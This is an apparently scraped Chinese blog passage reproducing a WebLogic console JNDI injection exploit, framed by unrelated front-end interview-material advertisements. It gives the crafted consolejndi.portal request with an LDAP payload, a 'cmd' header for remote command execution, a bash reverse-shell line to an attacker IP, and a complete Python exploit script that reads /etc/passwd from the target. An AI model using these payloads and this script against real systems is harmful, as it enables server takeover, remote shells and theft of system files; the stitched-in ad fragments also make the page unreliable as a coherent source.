最后
前端CSS面试题文档,JavaScript面试题文档,Vue面试题文档,大厂面试题文档
开源分享:【大厂前端面试题解析+核心总结学习笔记+真实项目实战+最新讲解视频】
2. 抓包,payload后面加入poc,然后再在请求包头部里面加入cmd:id(命令),如下图所示:
poc如下:
_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://x.x.x;x:1389/Basic/WeblogicEcho;AdminServer%22)
复现成功!
复现方式二——反弹shell值
================
1. 将上面请求头中cmd字段的值改为反弹shell的语句,进行编码,网址:java.lang.Runtime.exec() Payload Workarounds - @Jackson_T Payload Workarounds - @Jackson_T")
bash -i >& /dev/tcp/xx.xx.xx.xx/6666 0>&1
2.攻击机开始监听
3.将上面抓到的包cmd字段的值改为反弹shell的语句,进行发包
复现成功!
五、POC漏洞检测——(前提条件跳板机必须运行运行ldap环境才行)
==================================
import requests
import sys
import re
requests.packages.urllib3.disable_warnings()
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():
print(‘±-----------------------------------------’)
print(‘+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m’)
print(‘+ \033[34mGithub : https://github.com/PeiQi0 \033[0m’)
print(‘+ \033[34m公众号 : PeiQi文库 \033[0m’)
print(‘+ \033[34mVersion: Weblogic 多个版本 \033[0m’)
print(‘+ \033[36m使用格式: python3 poc.py \033[0m’)
print(‘+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m’)
print(‘+ \033[36mLDAP >>> ldap://xxx.xxx.xxx;xxx:1389 \033[0m’)
print(‘±-----------------------------------------’)
def POC_1(target_url, ldap_url, cmd):
vuln_url = target_url + “/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22{}/Basic/WeblogicEcho;AdminServer%22)”.format(ldap_url)
print(‘\033[36m[o] 正在请求: {}’.format(vuln_url))
headers = {
“User-Agent”: “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36”,
“cmd”: cmd
}
try:
response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)
if “root:” in response.text:
print(“\033[32m[o] 目标{}存在漏洞 \033[0m”.format(target_url))
print(“\033[32m[o] 响应为:\n{} \033[0m”.format(response.text))
else:
print(“\033[31m[x] 命令执行失败 \033[0m”)
sys.exit(0)
except Exception as e:
print(“\033[31m[x] 请检查参数和Ldap服务是否正确 \033[0m”, e)
def POC_2(target_url, ldap_url, cmd):
vuln_url = target_url + “/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22{}/Basic/WeblogicEcho;AdminServer%22)”.format(ldap_url)
print(‘\033[36m[o] 正在请求: {}’.format(vuln_url))
headers = {
“User-Agent”: “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36”,
“cmd”: cmd
}
try:
response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)
print(“\033[32m[o] 响应为:\n{} \033[0m”.format(response))
except Exception as e:
print(“\033[31m[x] 请检查参数和Ldap服务是否正确 \033[0m”, e)
if name == ‘main’:
title()
target_url = str(input(“\033[35mPlease input Attack Url\nUrl >>> \033[0m”))
ldap_url = str(input(“\033[35mLdap >>> \033[0m”))
POC_1(target_url, ldap_url, cmd=“cat /etc/passwd”)
前端面试题汇总
JavaScript
开源分享:【大厂前端面试题解析+核心总结学习笔记+真实项目实战+最新讲解视频】
性能
linux
前端资料汇总
50332c78eb27cc606540cdce3b4.png)
linux
前端资料汇总
扫一扫
2034
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
